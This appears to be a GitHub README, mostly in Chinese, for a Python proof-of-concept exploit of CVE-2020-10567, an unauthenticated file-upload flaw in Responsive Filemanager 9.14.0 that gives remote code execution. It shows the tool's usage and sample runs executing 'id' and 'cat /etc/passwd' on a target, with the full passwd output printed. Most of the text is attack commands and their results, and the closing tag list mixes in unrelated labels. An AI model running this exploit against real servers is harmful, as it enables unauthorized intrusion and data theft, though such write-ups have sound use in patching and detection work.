PierreAdams/POC-CVE-2020-10567

# POC-CVE-2020-10567 RCE poc - RESPONSIVE filemanager v.9.14.0。非主分支 ⚠️ 要求：无需任何条件，此漏洞为未授权利用。 Responsive Filemanager 应用程序是一个基于 Web 的文件管理工具，用于处理服务器上的文件。此漏洞 (CVE-2020-10567) 允许攻击者利用 ajax_calls.php?action=save_img 中的输入验证不当问题执行任意文件上传，从而导致在目标系统上进行远程代码执行。 此漏洞利用灵感来源于 Packet Storm 上公开的概念验证。(https://packetstorm.news/files/id/171280) # 用法 : ``` $ python3 POC_CVE-2020-10567.py -h usage: POC_CVE-2020-10567.py [-h] [-C COOKIE] -c COMMAND -u URL Exploit RESPONSIVE filemanager v.9.14.0 (not Main branche!!) options: -h, --help show this help message and exit -C COOKIE, --cookie COOKIE Cookie -c COMMAND, --command COMMAND Command to execute -u URL, --url URL RESPONSIVE filemanager url ``` ``` $ python3 POC_CVE-2020-10567.py -c 'id' -u http://127.0.0.1:8080 [>] Cookie collecting ... [>] Cookie collect : PHPSESSID=XXXXXXXXXXX [>] Requets POST Send [>] payload send [>] Response: uid=1000(application) gid=1000(application) groups=1000(application) ``` 您可以指定 cookie : ``` python3 POC_CVE-2020-10567.py -c 'cat /etc/passwd' -u http://127.0.0.1:8080 -C Cookie_Test [>] Cookie : Cookie_Test [>] Cookie collect : PHPSESSID=Cookie_Test [>] Requets POST Send [>] Payload send [>] Response: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin application:x:1000:1000::/home/application:/bin/bash blackfire:x:999:999::/dev/null:/bin/sh postfix:x:101:104::/var/spool/postfix:/usr/sbin/nologin ```

标签：CISA项目, CVE, CVE-2020-10567, PoC, Python, RCE, Responsive Filemanager, Web安全, 任意文件上传, 数字签名, 文件管理器, 无后门, 暴力破解, 未授权访问, 编程工具, 网络信息收集, 网络安全, 蓝队分析, 输入验证不当, 远程代码执行, 隐私保护